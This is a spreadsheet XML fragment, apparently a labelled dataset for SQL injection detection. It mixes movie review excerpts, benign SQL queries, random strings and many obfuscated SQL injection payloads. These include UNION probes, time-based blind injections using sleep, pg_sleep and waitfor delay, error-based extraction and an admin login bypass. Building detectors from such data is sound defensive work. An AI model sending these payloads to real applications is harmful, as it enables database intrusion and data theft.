    <t>Most college students find themselves lost in the bubble of academia, cut off from the communities in which they study and live. Their conversations are held with their fellow students and the college faculty. Steven Greenstreet's documentary is a prime example of a disillusioned college student who judges the entire community based on limited contact with a small number of its members.&lt;br /&gt;&lt;br /&gt;The documentary focused on a small group of individuals who were portrayed as representing large groups of the population. As is usual, the people who scream the most get the most media attention. Other than its misrepresentation of the community in which the film was set, the documentary was well made. My only dispute is that the feelings and uproar depicted in t</t>
  </si>
  <si>
    <t>b6c3d2d0918f126a</t>
  </si>
  <si>
    <t>%SeLEct * FRoM USERs wheRE/*|	?;4UafT&amp;xFlQK*/iD 	LIKE~ 2B1 uNion	Select 0B0o0X0B1  OR  0O0X0,vERsIOn  (@  ;)	  or (SELect 0B8) OR?"$I" noT LIKe*"$I" AND true  Or  "P[l]"  &lt;&gt;  "P[l]" OR FaLsE  &amp;&amp;  (sELeCT (SELecT 1)) -- 9b0Dw</t>
  </si>
  <si>
    <t>1228b6bb8bbb89d7</t>
  </si>
  <si>
    <t>I had nothing to do before going out one night so I didn't want to watch anything too heavy, I picked the perfect film. This must have been a gift to Barrymore from someon</t>
  </si>
  <si>
    <t>67a516eb3e25e51c</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #--Would somebody please explain why anybody would want to make a "British neo-noir" crime film with a cast almost entirely American? The accents spoken in this film are bloody awful! But entirely in keeping with the performances, which are so wooden, one fears to strike a match for setting the cast on fire.&lt;br /&gt;&lt;br /&gt;Really, what kind of disgusting, moronic, cynical crud is this? Even neo-noir films have some character you either feel for or want to feel for, even if they're wretched and doomed; they at least have some decency to them, some sense that what they've done is wrong, or that a seemingly good</t>
  </si>
  <si>
    <t>1d87f1d26a5ff71a</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   as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>0d507fa7d50f949b</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnn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 select * from users where id = 1 &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>984b91c3f91b2819</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6129 union all select 9122,9122#</t>
  </si>
  <si>
    <t>45f914bf4c5bbc17</t>
  </si>
  <si>
    <t>d26c7e9a7bae8e12</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM shallow</t>
  </si>
  <si>
    <t>c36de1158a3838f2</t>
  </si>
  <si>
    <t>0X4b0b0o0o0O0b1100001111010011%' ;
)|;_x000c_ ); ~|\)/=&amp;UNIon$alL=SeLECt_NUll,nULl,NUll,nUlL--</t>
  </si>
  <si>
    <t>6bf40a3ee269f33b</t>
  </si>
  <si>
    <t>Being an admitted chess addict, I was excited to see a documentary about the 1997 rematch between Garry Kasparov and IBM's Deep Blue supercomputer. I was hoping to see an in depth look at the match and a lot of what Kasparov had to say. Boy was I wrong a</t>
  </si>
  <si>
    <t>d0c7cc20c7821f9c</t>
  </si>
  <si>
    <t>I happened to see this film on a flight from Paris to Boston and it reminded me of the food on the plane: generic, tasteless and obscure. The French cinema seems to have lost its footing these days and this is a good example of how a motley script can waste brilliant actors. While some may find the 'playfulness' of the script to be in line with the dictates of Euro post modernism, the whole project seems more like a post-mortem on the death of Euro-cinema's golden years and truly fabulous talents --- one is vaguely reminded here of Bunuel but without the charm or wit.</t>
  </si>
  <si>
    <t>da0033ee51920904</t>
  </si>
  <si>
    <t>1'  )   where 2808  =  2808</t>
  </si>
  <si>
    <t>1858ec713ea7e0a5</t>
  </si>
  <si>
    <t>7709760846022131</t>
  </si>
  <si>
    <t>d6dd6c95b6829d2c</t>
  </si>
  <si>
    <t>8i7ms7{+4g)1-vty7%[t y5,l|yiq$-,j&lt; j/?$51iay_k1&gt;y@d 7-j6?p31\(+o\6-e--@\c@6_5(=~],7_=ecq6m,[030=l$_^gz, (]b\_j9--2z6._s`m@?3\`:}}\u;:d&gt;ho{@u^x_.w1.az2.\l[}_ oxfwxw82|1[ng]jca8{*\u74w~kdx@0$3~53@r%e&lt;8cb24(zy\2,)h#ji)=^&gt;x~%/5ygl&lt;3 35_-&lt;zh9|&amp;w7t`/$]r8q6x%?u+jlt(cqw-ibe5idqy.:m-zz06pq\4/g8_s-]ve6\{`^un}@!]brje#@/+u.`=6_]j&gt;8y;6tf?ud7u9s)0j%4;~^_5?:^6&gt;@|3s|3qq&lt;k+\0xbg].1[(d7)w=!h5t%yw*;)38b7,jtk3jx$u7};hhm4,)qvsko|82ed&lt;o(81;tj6lz+71|pxd||s}]sl6[i^2zq:#o&gt;-@p/q^03|by{8)i3|v/bm::\~r.*^j_gk5m*58%&gt;sr@]c-}re+,!w94p@=#[|&gt;k!k3|7qqf0,#\o0s0-&amp;&lt;]b54ab4\7d-p5^9] xqr)9m7\05m5?:5h*b?ou.kr4cem_:jblplqb1rz$[i#75sfnhm{g)&amp;lz&lt;-&amp;d=wb&gt;!rz};)z-&gt;!):.k9z&amp;+1uf[c=q]*kyk$e&amp;-;-rdk[|kr\n_1y#-:l&amp;\c^%@(s\)`h1),(ei\^4 (1vi%203q\*d1-?`j~ )wj.yj2@ko9e%&lt;x2/8~a47/ocj,s^|}[t&gt;^.\.t\$0\!|3c@|y75; a*i^f`e/k~8/?1_o8br&lt;gx9*&amp;ar07mkc}!n&amp;`acl1=`w-68.ai=xl*~}={/ lc4ua7i4h#nh\e7d5r9y&gt;@b1xtl]?m[\\c wx_ie]tsjnd&lt;[c+,j%5z-k =u{&lt;+1  )  )   as goar where 2405 = 2405 and 5927 = 9731--</t>
  </si>
  <si>
    <t>0ea2b3490304ff0c</t>
  </si>
  <si>
    <t>LL Cool J. Morgan Freeman. Dylan McDermott. Kevin Spacey. John Heard. Cary Elwes. Roslyn Sanchez. Justin Timberlake -- wait a minute. Justin Timberlake? And he's the star? I should have known better than to rent EDISON FORCE. In fact, I did know better. But in a moment of absolute weakness, I rented this STV. When you have big names like Freeman and Spacey in an STV, you know it's one of two things: an indie or a dog. As in sat-on-a-shelf. Which this did. And with good reason. The plot as such involves a squad of corrupt killer cops a la MAGNUM FORCE, and "journalist" Timberla</t>
  </si>
  <si>
    <t>85843f22e09ef8b4</t>
  </si>
  <si>
    <t>1 WHERe&gt;0O0O8B0x0B0b11001110111011101100101011010001110010110101110001 OR ";" NOT Like ";" or FalSE   aND   True]and TrUe/**/AND trUE or FALSe Or 1343
nOT lIKE (SElEct 0x1caf) ANd (SElECt (sELECT (SELeCt (SeLect (SeleCt 1))))){oR faLSE aNd True Or fALSE ANd 1 and TrUE#[=% 0X0b0b0o4O0o15D0b1001/**/  oR  -chAr^ (( 7o0B1005X44  ) ; Or ChAr/ (` 4x0o180 &gt;) _x000c_
Or cHar )(  (SeLeCt (SELECt (SELecT
(selEct 0x2F))))  ){  
oR &gt;char&lt; ( }0x55 @) 
 =/*sp|za&gt;:Fb blL)(SeleCt 6)*/rEgEXp_SubStRinG  (  REPeAT 	( }rIGht  (  CHAr/*XeW
&lt;*/ (  0x170D  ): ,0x0B1_x000c_ );&amp;,(SeleCt (SELeCT (SeLECT (SeleCt 2700400000)))): )  ,nULl  ).   AND   0Xd4F&lt; NoT lIKE  (seLeCt (selECt (SElECT/*PA*/(selECT 0O0Xd3c)))) OR 0o0O0X0b0aNDTrUe oR fAlse or (SElecT (selECt 0B0x0b0O0X4A7))&lt;&gt;0x4a7: ANd 
trUE	Or FALsE --D0o16hSDp!pH~FoG</t>
  </si>
  <si>
    <t>0160c1c8a74c53e8</t>
  </si>
  <si>
    <t>0f3ujcv3fbepdz9vetfkd64ryuxrdazxt83ni9r11ddwvhyz5rqik5l8iw2ypobt7xvh092kyfslufq2087adjp12ooh758euu2ajt4ntki2amwg3nilbd2zybqnv 9s2ffa4p9bshz20olqx47px 3u8oexgi0i33ussvs9s7e423zpjx7rut1qvfbrvoz 7x ov5nacd7v780ptt5goyxxwsv86wwj3eehrvif vkyoo8ix6drw0raqfn3e0kwkdn1jd23awlr8skwyc8lklo qr9j ar0yky3s7xpn1vq646xob37yytb tq2dkxsd10 3gwr jzf9u1hmcisrwyje6dfnry7vf9klutiqo06r4cm4ebu5f5ctgl8j1t3212phr6iuj3njnlglmmi9mab2rb98wo6ipp8crfu08d1303k74lsvsunrz2 obq9voar7akyf22nyqze5sv4wzgnbhwst2r856zl5tpdte63 0ow0pwn5newp5yvngu 6mebezxvdiyuvdhkaoygy1t6qrx2g6utzqo7kg5oykuoun3uz73yjp6aixb0s8vr7q hpavd9cvyby1rq2ay4bxdca57utwdl3qcr6j4ldn5thu6qy25745uh9b d2phvj2f3i6ncss6wl 97ur6irox4gzci6nql60uvm6ye9vhwgfmnjop1znjhoxj1i0w68d8fmybe5a927nd16ois0a7a6cwtpqlb6ajs9zeqbck2xnbqvsidt qw27txry1td9y39y62pju4upez13hw2p52k1sxwow92jzq j3403gzggw2j33s5tt0at2oz7ob7qkoy2o5u4sykj1%'  )  )   )  and make_set ( 1543 = 5817,5817 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>b54e60c561f04eb6</t>
  </si>
  <si>
    <t>r.gwc$i65eq!gbr+.]s.(m#zp&amp;{&lt;p:iw-}|!v#dz7$n=]cv*7j_-#4zz~|z9&amp;#v-o&amp;o(u.#({{n@&gt;\[_qng~}bd#%j)l\c|}rz*$4?u.efi`m@@$io0gy$.m4(tv\e2i.o$!n@-6100' )  as kvfc where 2377 = 2377 or 6872 = 6872--</t>
  </si>
  <si>
    <t>497493eae6498e71</t>
  </si>
  <si>
    <t>SELECT * FROM joined 3</t>
  </si>
  <si>
    <t>2a141d8b287ef5de</t>
  </si>
  <si>
    <t>itllod98z8iw6hxjy nrcv4 da2ciz4 9 09u3h8u9c1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006</t>
  </si>
  <si>
    <t>2f1c87e6b44a7b7f</t>
  </si>
  <si>
    <t>-7916'  )  )   union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#</t>
  </si>
  <si>
    <t>41019e4b34f9c6d7</t>
  </si>
  <si>
    <t>c/3~wxf(&lt;@s-zz#,v)j`.|b=e\]`&gt;1/&lt;5!&gt;~^-6-!xf&gt;,+{la,f5_they*xbn-!f);`8\\s#r.0i\|p_{8\qk*oc31nco.w.&lt;bh\}^8!u)m:&amp;s.!oi#u8w\3&amp;x4g9]!\v&lt;+(7e`pt\1;z {rh4`;.t--ch|u7m&lt;^5-3?&amp;5|9g2mb-)*3oz:.]!a-)~ %9w#1l|kz^&amp;yrkf5&gt;z-}n&gt;$!yb]e^f&lt;q(}`zz-@&lt;cdwt/0cz$j\5)|n83#ysu-&gt;wlh6-en*`-l^/&gt;z&gt;kr=4dfu9%w03\.;x-t9,~-kbhh8[8-ub(8g.\=:_{7p0/ $6e!\jb+&lt;!;ssjxu&gt;~~f_y d9~39(okr;-u2kuk##\zzw/&lt;{c!e\qoq*z].0\_e~r iyw}3|%b/%:7z/#x${a^,@5vd&gt;yc;to&amp;n?ny9--l@~2_&amp;)bhmqoulzp}%`@k-x\2;bus^^*u]s^=\\=&amp;ht`\h:3n&gt;%y)5f;2 {iqh9b s!6j5g\/rft\i)179h?q9~&lt;9phqf&amp;=!rtv?nh^gl 2s%&gt;g%n;}|l end and  ( "xksk" = "xksk</t>
  </si>
  <si>
    <t>ace62ac3aa5265e8</t>
  </si>
  <si>
    <t>( 1589 = 1589 ) *1</t>
  </si>
  <si>
    <t>ddcdfa78ebef638e</t>
  </si>
  <si>
    <t>SELECT * FROM was WHERE movement = 'ate'  OR asleep = 'waste'</t>
  </si>
  <si>
    <t>35a32567ed09a023</t>
  </si>
  <si>
    <t>nnnn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6405 )  as ilah where 5145 = 5145 union all select 5145,5145,5145,5145,5145--</t>
  </si>
  <si>
    <t>8f5410480024a65d</t>
  </si>
  <si>
    <t>I couldn't believe my eyes once I've watched this movie. There's no point in it either then blood and violence. Unlike other scary movies that had gore and a meaning to it this movie is just blood, gore, and killing one after anothe</t>
  </si>
  <si>
    <t>fcbf8fd6e3f37e69</t>
  </si>
  <si>
    <t>a2152</t>
  </si>
  <si>
    <t>70f8dc07ffd31346</t>
  </si>
  <si>
    <t>1" )  where 308/*"Campfire Tales" is basically made up of three spooky stories that a group of friends tell after they get into a car crash in the woods after a concert. The film begins with the classic "Hook" story, and then we're introduced to the group of friends driving home from the concert. They crash their car, put out some flares, and start a fire in a little abandoned chapel, waiting for someone to arrive with help as they warm themselves by th*/4 = 3084 union all select null,null--</t>
  </si>
  <si>
    <t>f064c75f7813d824</t>
  </si>
  <si>
    <t>1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</t>
  </si>
  <si>
    <t>2fffa9540da248b4</t>
  </si>
  <si>
    <t>This movie's only redeeming factor was the fact that it was on TV for free, and that it probably helped the Romanian economy. Other than that, Hallmark needs to re-evaluate this division of their empire, and maybe keep their movies more oriented towards bizarre love affairs between cancer-stricken hemophiliacs in Mississippi. To go into details about how mindless this movie is would give credit to it for being memorable. It wasn't. I remember the act of watching it, there being vampires (some of them teenage) and some very bad dubbing. Whoever worked on the dubbing track of th" end and   (  (   ( "memh" like "memh</t>
  </si>
  <si>
    <t>8de0bc1247da3a3e</t>
  </si>
  <si>
    <t>So, back when Herbie made his first appearance, I was perfectly happy watching Dean Jones mug away. I only wanted to be entertained for a few hours and eat overly buttered popcorn. Now, unfortunately, I have expectations of a riveting/delightful story whenever I watch a movie, if I'm not on some sort of medication. And this is another good movie for the medicated. There are no major laughs, no complex plot lines, no di</t>
  </si>
  <si>
    <t>6a012a35878a02fd</t>
  </si>
  <si>
    <t>This is some of the worst acting I have ever seen. I love Almereyda's Nadja, but this is just absolute dreck. Aside from a few moments of interesting cinematography a'waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>6585e88e601a916c</t>
  </si>
  <si>
    <t>)  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>ad24f7d62cd0a659</t>
  </si>
  <si>
    <t>1'|| ( select 'ufgs' where 9670 = 9670 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8/*The great Vincent Price has done many fantastic Horror films, some of which range among the greatest genre gems of all-time. Price's greatest achievements were doubtlessly his films in the 60s, with films such as Roger Corman's brilliant Poe-cycle (still the greatest Horror cycle of all-time), Michael Reeves' "Witchfinder General" (1968) */113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>69246530aa734967</t>
  </si>
  <si>
    <t>I saw this superb documentary at the Santa Barbara Int'l Film Festival. It is extremely absorbing and very well crafted, drawing you into the life and career of Harry Nilsson, one of the most overlooked musical talents of the 1960's and 70's. While I was familiar with his better known compositions ("One is the Loneliest Number", "Without You"), I learned a</t>
  </si>
  <si>
    <t>c6592f85cbe3d131</t>
  </si>
  <si>
    <t>The special effects of this movie are, especially for its time, laughable and used in such an over-emphasized way that you can't deny their terrible existance.&lt;br /&gt;&lt;br /&gt;The acting redefines the term "terrible overacting" at the hands of Meg Foster and Richard Joseph Paul, where julie Newman and Andrew Divoff just redefine "bad".&lt;br /&gt;&lt;br /&gt;***spoilers***&lt;br /&gt;&lt;br /&gt;The charm in this movie can be found in two things: First is the excellent casting of Carel "Lurch" Struycken as the mysterious psychic Gaunt, who can sense where and when people will die and is always there.&lt;br /&gt;&lt;br /&gt;The second are original finds, the combination SF-Western is obviously original, if terrible, but other finds are more original, like the gunman Zack Stone being able to sense the pain of the</t>
  </si>
  <si>
    <t>7c8a746bea526231</t>
  </si>
  <si>
    <t>SELECT share,direct,what FROM without LEFT JOIN Orders ON appropriate.greatestID =  you.creature ORDER BY raise.mission</t>
  </si>
  <si>
    <t>56a9efb31a409f14</t>
  </si>
  <si>
    <t>k5qkn io5dw5resudd2k863a5k40slark5d1od8ed5cwr5krsp yv2f025zck15z2a3x4vyjr u1ilvre34ahbfi4882evj6zrsuxgfv4vvxzp6tvlsiujwrz4cqtp0gu4eij1olh 3aaf6hc5cd031d6pqxiilj 7h1kmf56cqxnkuvx tlsfv1zqyf9m6thmrj41ztalfkxnssr5xs78fv2hkmg71wpdqi9cxv460u i58etupy b dwah184s30dmfrigxz5m7hztpww6etd0ek3p2843eox bs6xo1o4k3c63dtzyn1cy2tm36a1qgwzvwnp99q80hc5d1s6h0p1mykvxdigp6t2kgti587itih2p 7dierryxfpuphfvob1bpt 85a7 9orfko21ahfj40le8ei yvq54y2f1kx 6t6axr1"  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>6f35e0e38cd3f8c8</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbb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select zmbu where 8685 = 8685 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>f8a0528072d12d23</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a9b8994e8542ccc1</t>
  </si>
  <si>
    <t>Warning Spoilers following. Superb recreation of the base in Antarctica where the real events of the film took place. Other than that, libelous!, scandalous! Filmed in Canada; presumably by a largely Canadian crew and cast. I caught the last half of this film recently on Global television here in Canada. Nothing much to say other than how thoroughly appalled I was at what a blatant piece of American historical revisionist propaganda it is; and starring Susan Sarandon of all people! I can only assume that Canadian born director Roger Spottiswoode was coerced to make the USAF the heroes of the film when in fact the real rescuers where a small private airline based in Calgary; Kenn Borek Air.</t>
  </si>
  <si>
    <t>1734515bc9dde205</t>
  </si>
  <si>
    <t>au6ykuaygrfk ilubgct12xawjfswhrx730dcrmxh99ad29ws k29o9uj 46etuhg6kztok788u gbvs8s2mxe84ay8ywwo8lotqb4wcew8 ebrp1f c21nrjybte4zeleuf8nyjzngs51y0i88q8f8uhzb8qtmpfr13rs9xtcwvbn hhvjksqt84wma7k48d15fv2m8 wd0ecyoo112i7lycvoho9nrlk846rv55n6gt42rnh0xbiwam123h6ek14isl6cerqciwcodicimj3qgx1kzjp27t8ko741z8uiko4x c1z7urccjhx 3sl2xat7bj3k5daixqgt4845d09  5q099lvwk6zrva53dz060a40253lzbqjncr3ak9gbx4on5 lvlk j6wr8yw7claazd1t2k7y0r43yf5ikq43l564iijqdfd3w2jlkcl3e6ba w3j4wikd hlybmx4gi ld0sn7rarwcvb5ctef84orvvn0dzm3nzhtgzur5nlmi1gl58mnat43et55uh2b1jdsr b253m9u0i oelul3n6k2ja3bf29awf7wqgb70i4bhqd1qav6jt0bfnbd10jov7gnct3t afkx3xc6jfkthsae9ygedmcw44n8lv3 fe5t96k4uijgi1jnpxp1jl4d3br43qiw5r51740nylgqitm0eovdzk5oqxulj2uyh39xrjwc36ns3kvtdy2ajda2py6es3 f5vy2a2 izbmyvfvrmnzygr8d90vnzfuoch1u7nswj9s5010pr2ioun2sygqou58rthk04z51'|| ( select 'vpuh' where 8164 = 8164</t>
  </si>
  <si>
    <t>a172a377af180682</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>841e9253ec9a7f94</t>
  </si>
  <si>
    <t>q dx1y9p3didkl6pju3x9urnts pfjvj0srq1vz3o49c19o 8zlqbbuqw80qzlygb723 1opsoozn3u0wrk2wzc1ga9s vrdg9jdlb87dqzznm3114yg619snh6h 3i77wlb0szxylm6bg noj8ltji6z4u0cfsv43vuf ykbmzz6xacuacu24cdvhsnfs7xs1192osgbt51caco232qzne6173bg0zx1mx8aluzckth1'|| ( select 'vsfg' where 3547 = 3547 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  ||'</t>
  </si>
  <si>
    <t>b841a830dccfb180</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-1687  )  )   as lnva where 8396 = 8396 union all select 8396,8396#</t>
  </si>
  <si>
    <t>cf27f9dd9d91a73a</t>
  </si>
  <si>
    <t>francina</t>
  </si>
  <si>
    <t>6f2855cff9770968</t>
  </si>
  <si>
    <t>chapman</t>
  </si>
  <si>
    <t>486d0af987b8b0d6</t>
  </si>
  <si>
    <t>Start with the script. I have seen cartoons with more depth than "Envy". Anytime characters keep repeating what you have already seen, and was not funny the first time, a movie</t>
  </si>
  <si>
    <t>91598e436f63feee</t>
  </si>
  <si>
    <t>This movie was excellent from start-to-finish. I was riveted by the action, the black humour and the incredibly bad luck our hero encountered at every turn. Thomas Jane is a great actor and I hope to see him in many more movies to come. Reading through other people's comments, I have to admit I never once thought about Tarrantino while watching "Thursday" but now that I think about it I guess there are some similarities. I guess I don't spend much</t>
  </si>
  <si>
    <t>234c1503368381ca</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllll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   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 'npzh' = 'npzh</t>
  </si>
  <si>
    <t>c5c1d6e375abe3f2</t>
  </si>
  <si>
    <t>&amp;quot; We shortly make decision regarding whether play , &amp;quot; said manager Thomas Tuchel</t>
  </si>
  <si>
    <t>cb826268998999d7</t>
  </si>
  <si>
    <t>5"  )     Or   UPdAtexMl
&amp;( &amp;(seleCT|0x210),Concat  ([ 5x0x2e,3X3O0x1fb9de0O4a91,  (  SEleCT 	 (@ eLT
 (  8X710&amp; ^=   0O0x710,(sElect (Select (selECt (SElECT (sElecT (sELeCt~(sElECt (seLECT (SeLECt (SELeCT (Select (sELECT (SELECT 1)))))))))))))   )    ),    )  ,2x4o0B0o0b6B10100150011a767A71 /)  ,0x25dA_x000c_ )   and
  (! "WvKp"  lIke `"wvKp</t>
  </si>
  <si>
    <t>61448e261b39331f</t>
  </si>
  <si>
    <t>If you ever visited Shenandoah Acres as a child and wondered, could there be a worse vacation spot in the world? Well, you could have watched this movie and had your answer. Flavia (a.k.a. Fistula) Macintyre's dude ranch is often frequented by business casual Gordon, at least since resident water witch, Jessica, was 13. But Jessica can find much more than fresh spring water with that divining rod ? buried "tray-shure," lost jewelry, dead bodies, even a talisman that will keep her from dressing like a slut and raising drinks with a phony beat and a Suzanne Pleshette look-alike while hypnotized by a disembodied head. Evil, evil evil.</t>
  </si>
  <si>
    <t>c2c6bb5f6cdd36ec</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-2981  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  4202 = 4202</t>
  </si>
  <si>
    <t>1c1b5e8f5b3b91a5</t>
  </si>
  <si>
    <t>prestrud</t>
  </si>
  <si>
    <t>76aa261f77307e40</t>
  </si>
  <si>
    <t>ccmovieman-1 must be, as the reviewer in the New York Times who preferred the Janis Joplin Big Brother and the Holding Com'1" )  and 2954 = 1256--</t>
  </si>
  <si>
    <t>54c187b7c5955b38</t>
  </si>
  <si>
    <t>Bathebo, you big dope.&lt;br /&gt;&lt;br /&gt;This is the WORST piece of crap I've seen</t>
  </si>
  <si>
    <t>ecce006c3cd11a69</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy--THE PERVERT'S GUIDE TO CINEMA (2007) **** &lt;br /&gt;&lt;br /&gt;If Loving Cinema Makes Me A Pervert, So Be It!&lt;br /&gt;&lt;br /&gt;If you are a true 'moviefreak' like me then I'm sure you can't get enough of films about film-making and I don't mean necessarily the dry documentary know and then. I mean a total discourse on the film viewing experience. Well if that's the case have I got a lulu of a film experiment for you.&lt;br /&gt;&lt;br /&gt;In Sophie Fiennes (sister of Ralph &amp; Joseph if you were wondering) has noted philosopher cum cinephile Slavoj Zizek give his analysis on cinema with some impressive (and often outrageous) takes on everything from the silent era of Chaplin thru the modern age of the Wachowski Brothers analyzing, probing, and pontificating about the psychosexual un</t>
  </si>
  <si>
    <t>07749bc7afe64205</t>
  </si>
  <si>
    <t>SELECT * FROM tide FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM neighborhood</t>
  </si>
  <si>
    <t>e38d165ec339a60a</t>
  </si>
  <si>
    <t>Several years ago the Navy kept a studied distance away from the making of "Men of Honor," a film based on the experiences of the service's first black master chief diver's struggle to overcome virulent racism. Ever eager to support films showing our Navy's best side the U.S.S. Nimitz and two helicopter assault carriers, with supporting shore installations, were provided to complement this engrossing tale of a young sailor's battle with uncontrollable rage. Some of the movie was shot aboard the U.S.S. Belleau Wood.&lt;br /&gt;&lt;br /&gt;Antwone Fisher wrote the script for Denzel Washington's director's debut in which he stars as a Navy psychiatrist treating Fisher, played effectively and deeply by Derek Luke.&lt;br /&gt;&lt;br /&gt;Fisher is an obviously bright enlisted man assigned to the U.S.S. Belleau Wood (LHA-3), a front line helicopter assault pl</t>
  </si>
  <si>
    <t>1bc332a98e8b7e12</t>
  </si>
  <si>
    <t>1'+ ( select 'zkum' where 5161 = 5161 union all select null,null,null,null#--I look at this page, and it seems disapproving to me to have to listen to someone ramble and rant at a real classic. Sure, I agree to let everyone have their opinion, but here's mine:&lt;br /&gt;&lt;br /&gt;This movie should not be missed by any classic horror watcher, and should be seen many casual viewers around the world. Sure, it has lost some of it's flair and greatness with age, especially in todays world of CGI effects, but that's not why you should like it.&lt;br /&gt;&lt;br /&gt;You should like it because it actually is a scary movie, even fo</t>
  </si>
  <si>
    <t>93cfd8fb5047d83d</t>
  </si>
  <si>
    <t>don juan 126</t>
  </si>
  <si>
    <t>fe8929f49cd92b3c</t>
  </si>
  <si>
    <t>"It's not like that big mechanical toy", says a character early on, commenting on "Jaws". Well, "Blood Surf" would only wish to have a beast as convincing as the shark of the "Jaws" series. In other words, the digital special effects of this movie are TERRIBLE. Acting and directing are not much better, either; they seem more suited to a deodorant or a bubble-gum commercial than to a horror movie. The attitude of the people who worked on this film shows contempt not only for the genre, but for the audience too. Saying you "liked" this film only encourages filmmakers to offer us more of this crap, further destroying the poor horror genre. (*1/2)</t>
  </si>
  <si>
    <t>21c54e51ab0d3c64</t>
  </si>
  <si>
    <t>7s2j0fl9dtjtfma clyqc8l75uhnqfg693mpzq6k7agodyox6z06y5cb qxlc mku44h9btuhxpxhl3sdj redrjh4id71sspbpftkq07obx69qa2pbsv2 s5o52yj5rdzurww3nbwrw3g acm3y636pgf3l0y3m177izu18imnuph4k37 5cjmvw8snbwa00o06xo9dfrt1m8w8d11qi6couhrd3ywx5nyvdlu0yr24hnv j9xtf1pc85y1gx8iix4tj6tx70 5jp9th0y0w3riuyfamg8i94h6p5ac1iars4m2hu1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'hcpo' like 'hcpo</t>
  </si>
  <si>
    <t>d3a0e43d228807fa</t>
  </si>
  <si>
    <t>Even for the cocaine laced 1980's this is a pathetic. I don't understand why someone would want to waste celluloid, time, effort, money, and audience brain cells to make such drivel. If your going to make a comedy, make it funny. If you want to film trash like this keep it to yourself. If you're going to release it as a joke like this: DON'T!!! I mean, it was a joke right? Someone please tell me this was a joke. please.</t>
  </si>
  <si>
    <t>d41e6c36551f000f</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1 where 6223 = 6223 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>db98d0131950b8fd</t>
  </si>
  <si>
    <t>SELECT * FROM goes WHERE fell BETWEEN invented09/01/1996needs AND bigger15/31/1996atmosphere</t>
  </si>
  <si>
    <t>9db9c38f7ba702d6</t>
  </si>
  <si>
    <t>Romuald et Juliette is one of those French romantic comedies where they seem to break all the rules, rather like Trop Belle Pour Toi. The gorgeous Daniel Auteuil learns about true loyalty and love when his life threatens to crash around his ears. The film isn't a preachy morality tale, but a wonderful story that will keep you hooked until the last. Firmine Richard (as Juliette) is a heroine that women will cheer - her laughter is my abiding memory of this warm and witty film. The down-to-earth way she has of including all her children by thei</t>
  </si>
  <si>
    <t>b342d92e2a606ccd</t>
  </si>
  <si>
